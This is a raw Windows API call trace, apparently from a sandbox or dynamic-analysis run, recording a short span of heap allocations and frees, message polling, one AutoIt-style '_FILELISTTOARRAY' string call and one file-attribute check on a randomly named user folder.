hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4a8 | out: hHeap=0x1780000) returned 1 [0103.112] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2810 | out: hHeap=0x1780000) returned 1 [0103.112] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x40a88c8 | out: hHeap=0x1780000) returned 1 [0103.112] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27c0 | out: hHeap=0x1780000) returned 1 [0103.112] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca538 | out: hHeap=0x1780000) returned 1 [0103.112] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca658 | out: hHeap=0x1780000) returned 1 [0103.112] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfc70 | out: hHeap=0x1780000) returned 1 [0103.112] PeekMessageW (in: lpMsg=0x144ee2c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ee2c) returned 0 [0103.112] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac200 | out: hHeap=0x1780000) returned 1 [0103.112] PeekMessageW (in: lpMsg=0x144ee2c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ee2c) returned 0 [0103.112] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8f48 | out: hHeap=0x1780000) returned 1 [0103.112] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1d8 | out: hHeap=0x1780000) returned 1 [0103.112] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca268 | out: hHeap=0x1780000) returned 1 [0103.112] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca448 | out: hHeap=0x1780000) returned 1 [0103.112] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27f0 | out: hHeap=0x1780000) returned 1 [0103.112] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf9a0 | out: hHeap=0x1780000) returned 1 [0103.112] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca430 | out: hHeap=0x1780000) returned 1 [0103.112] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2740 | out: hHeap=0x1780000) returned 1 [0103.112] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfab8 | out: hHeap=0x1780000) returned 1 [0103.112] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cccb0 | out: hHeap=0x1780000) returned 1 [0103.112] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27e0 | out: hHeap=0x1780000) returned 1 [0103.112] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3d0 | out: hHeap=0x1780000) returned 1 [0103.112] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3e8 | out: hHeap=0x1780000) returned 1 [0103.112] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfa68 | out: hHeap=0x1780000) returned 1 [0103.112] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0103.112] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac700 | out: hHeap=0x1780000) returned 1 [0103.112] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0103.112] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac180 | out: hHeap=0x1780000) returned 1 [0103.112] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0103.112] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2910 [0103.112] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2760 [0103.113] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391c78 [0103.113] CharUpperBuffW (in: lpsz="_FILELISTTOARRAY", cchLength=0x10 | out: lpsz="_FILELISTTOARRAY") returned 0x10 [0103.113] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391c78 | out: hHeap=0x1780000) returned 1 [0103.113] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2760 | out: hHeap=0x1780000) returned 1 [0103.113] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfa68 [0103.113] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e28a0 [0103.113] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf860 [0103.113] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca3d0 [0103.113] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2880 [0103.113] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca3e8 [0103.113] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2880 | out: hHeap=0x1780000) returned 1 [0103.113] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2840 [0103.113] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca430 [0103.113] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2850 [0103.113] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1d8 [0103.113] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2850 | out: hHeap=0x1780000) returned 1 [0103.113] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2740 [0103.113] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca448 [0103.113] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28f0 [0103.113] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28f0 | out: hHeap=0x1780000) returned 1 [0103.113] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca220 [0103.113] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb08 [0103.113] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1f0 [0103.113] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2850 [0103.113] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1f0 | out: hHeap=0x1780000) returned 1 [0103.113] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf900 [0103.113] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1f0 [0103.113] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca250 [0103.113] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfbf8 [0103.114] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca268 [0103.114] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2860 [0103.114] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5c8 [0103.114] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca538 [0103.114] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfa90 [0103.114] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6e8 [0103.114] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28b0 [0103.114] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4d8 [0103.114] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2730 [0103.114] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2730 | out: hHeap=0x1780000) returned 1 [0103.114] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfce8 [0103.114] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca550 [0103.114] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28f0 [0103.114] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca550 | out: hHeap=0x1780000) returned 1 [0103.114] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc70 [0103.114] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6a0 [0103.114] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8be8 [0103.114] PeekMessageW (in: lpMsg=0x144eb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eb54) returned 0 [0103.114] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf950 [0103.114] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca700 [0103.114] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2750 [0103.114] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca700 | out: hHeap=0x1780000) returned 1 [0103.114] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf9a0 [0103.114] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca718 [0103.114] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca700 [0103.114] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2730 [0103.114] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca700 | out: hHeap=0x1780000) returned 1 [0103.114] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca730 [0103.114] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2730 | out: hHeap=0x1780000) returned 1 [0103.115] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf978 [0103.115] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4f0 [0103.115] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2770 [0103.115] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4f0 | out: hHeap=0x1780000) returned 1 [0103.115] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfae0 [0103.115] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca610 [0103.115] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca568 [0103.115] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28c0 [0103.115] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca568 | out: hHeap=0x1780000) returned 1 [0103.115] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4f0 [0103.115] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28c0 | out: hHeap=0x1780000) returned 1 [0103.115] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf9c8 [0103.115] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca550 [0103.115] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2890 [0103.115] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca550 | out: hHeap=0x1780000) returned 1 [0103.115] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfab8 [0103.115] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca700 [0103.115] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca550 [0103.115] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27c0 [0103.115] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca550 | out: hHeap=0x1780000) returned 1 [0103.115] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4a8 [0103.115] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27c0 | out: hHeap=0x1780000) returned 1 [0103.115] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc98 [0103.115] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca658 [0103.115] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27c0 [0103.115] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca658 | out: hHeap=0x1780000) returned 1 [0103.115] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cff40 [0103.115] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca550 [0103.115] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca568 [0103.116] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28c0 [0103.116] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca568 | out: hHeap=0x1780000) returned 1 [0103.116] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca568 [0103.116] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28c0 | out: hHeap=0x1780000) returned 1 [0103.116] PeekMessageW (in: lpMsg=0x144eb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eb54) returned 0 [0103.116] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2830 [0103.116] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd88 [0103.116] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca580 [0103.116] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28c0 [0103.116] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca640 [0103.116] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28c0 | out: hHeap=0x1780000) returned 1 [0103.116] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca658 [0103.116] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28c0 [0103.116] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca670 [0103.116] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28c0 | out: hHeap=0x1780000) returned 1 [0103.116] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9b8 [0103.116] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2870 [0103.116] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca838 [0103.116] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2870 | out: hHeap=0x1780000) returned 1 [0103.116] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7a8 [0103.116] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27f0 [0103.116] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca7c0 [0103.116] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7a8 | out: hHeap=0x1780000) returned 1 [0103.116] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x90) returned 0x4050e78 [0103.116] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x84) returned 0x1b7c4e8 [0103.116] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27e0 [0103.116] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9d0 [0103.116] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2820 [0103.116] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7a8 [0103.117] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2810 [0103.117] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7a8 | out: hHeap=0x1780000) returned 1 [0103.117] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x90) returned 0x4050fa8 [0103.117] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4050fa8 | out: hHeap=0x1780000) returned 1 [0103.117] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2810 | out: hHeap=0x1780000) returned 1 [0103.117] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9d0 | out: hHeap=0x1780000) returned 1 [0103.117] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2820 | out: hHeap=0x1780000) returned 1 [0103.117] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca868 [0103.117] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7c0 | out: hHeap=0x1780000) returned 1 [0103.117] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4050e78 | out: hHeap=0x1780000) returned 1 [0103.117] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27f0 | out: hHeap=0x1780000) returned 1 [0103.117] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca640 | out: hHeap=0x1780000) returned 1 [0103.117] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca580 | out: hHeap=0x1780000) returned 1 [0103.117] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca670 | out: hHeap=0x1780000) returned 1 [0103.117] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca658 | out: hHeap=0x1780000) returned 1 [0103.117] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca838 | out: hHeap=0x1780000) returned 1 [0103.117] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9b8 | out: hHeap=0x1780000) returned 1 [0103.117] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfd88 | out: hHeap=0x1780000) returned 1 [0103.117] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2870 [0103.117] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797088 [0103.117] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9d0 [0103.117] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x110) returned 0x43cccb0 [0103.117] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1b7c4e8 | out: hHeap=0x1780000) returned 1 [0103.117] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9d0 | out: hHeap=0x1780000) returned 1 [0103.117] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797088 | out: hHeap=0x1780000) returned 1 [0103.117] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2870 | out: hHeap=0x1780000) returned 1 [0103.117] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2830 | out: hHeap=0x1780000) returned 1 [0103.118] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca868 | out: hHeap=0x1780000) returned 1 [0103.118] PeekMessageW (in: lpMsg=0x144eb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eb54) returned 0 [0103.118] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27f0 [0103.118] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2810 [0103.118] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca898 [0103.118] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2760 [0103.118] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796ee8 [0103.118] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796fc8 [0103.118] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca898 | out: hHeap=0x1780000) returned 1 [0103.118] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2760 | out: hHeap=0x1780000) returned 1 [0103.118] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796fc8 | out: hHeap=0x1780000) returned 1 [0103.118] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796ee8 | out: hHeap=0x1780000) returned 1 [0103.118] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2810 | out: hHeap=0x1780000) returned 1 [0103.118] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27f0 | out: hHeap=0x1780000) returned 1 [0103.118] PeekMessageW (in: lpMsg=0x144eb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eb54) returned 0 [0103.118] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27f0 [0103.118] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27f0 | out: hHeap=0x1780000) returned 1 [0103.118] PeekMessageW (in: lpMsg=0x144eb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eb54) returned 0 [0103.118] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2870 [0103.118] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca880 [0103.118] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27f0 [0103.118] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9d0 [0103.118] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2820 [0103.118] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796fc8 [0103.118] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796ee8 [0103.118] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca880 | out: hHeap=0x1780000) returned 1 [0103.118] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9d0 | out: hHeap=0x1780000) returned 1 [0103.118] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2820 | out: hHeap=0x1780000) returned 1 [0103.119] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796ee8 | out: hHeap=0x1780000) returned 1 [0103.119] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796fc8 | out: hHeap=0x1780000) returned 1 [0103.119] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27f0 | out: hHeap=0x1780000) returned 1 [0103.119] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2870 | out: hHeap=0x1780000) returned 1 [0103.119] PeekMessageW (in: lpMsg=0x144eb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eb54) returned 0 [0103.119] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2760 [0103.119] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2830 [0103.119] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cff68 [0103.119] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7d8 [0103.119] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2730 [0103.119] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca958 [0103.119] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2730 | out: hHeap=0x1780000) returned 1 [0103.119] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Videos\\KW4s-- cgXZEZC\\T H0jeo_wwrX\\jyNO5NcyIG2nrd\\" (normalized: "c:\\users\\fd1hvy\\videos\\kw4s-- cgxzezc\\t h0jeo_wwrx\\jyno5ncyig2nrd")) returned 0x10 [0103.119] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca958 | out: hHeap=0x1780000) returned 1 [0103.119] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7d8 | out: hHeap=0x1780000) returned 1 [0103.120] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cff68 | out: hHeap=0x1780000) returned 1 [0103.120] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2830 | out: hHeap=0x1780000) returned 1 [0103.120] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2760 | out: hHeap=0x1780000) returned 1 [0103.120] PeekMessageW (in: lpMsg=0x144eb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eb54) returned 0 [0103.120] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2730 [0103.120] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfe78 [0103.120] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca910 [0103.120] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2810 [0103.120] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7c0 [0103.120] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2810 | out: hHeap=0x1780000) returned 1 [0103.120] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca880 [0103.120] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28c0 [0103.120] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8c8 [0103.120] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28c0 | out: hHeap=0x1780000) returned 1 [0103.120] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8b0 [0103.120] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2780 [0103.120] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca940 [0103.120] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca940 | out: hHeap=0x1780000) returned 1 [0103.120] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8b0 | out: hHeap=0x1780000) returned 1 [0103.120] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2780 | out: hHeap=0x1780000) returned 1 [0103.120] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7c0 | out: hHeap=0x1780000) returned 1 [0103.120] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca910 | out: hHeap=0x1780000) returned 1 